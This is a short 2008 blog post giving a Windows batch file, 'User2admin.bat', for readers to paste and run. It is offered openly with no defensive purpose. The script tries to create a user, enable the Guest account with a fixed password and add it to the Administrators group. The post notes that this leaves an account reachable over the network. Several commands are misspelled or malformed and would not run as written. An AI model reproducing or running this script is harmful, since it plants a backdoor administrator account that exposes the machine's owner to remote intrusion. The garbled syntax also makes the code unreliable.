All you need to do is copy the code below,copy/paste it into Notepad and save it as User2admin.bat on ur desktop.
echo off
title Please wait...
cls
net user add Username Password/add
net user localgroup Administrtors Username/add
net user Guest 420/active:yes
net localgroup Guests Guest/DELETE
net localgroup Administrators Guest/add
del%()
Double-click the file to execute or typethe above-given code in Commend Prompt.
Note: this also creates a net account which is also accessable through nets open port.
Tuesday, August 19, 2008
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment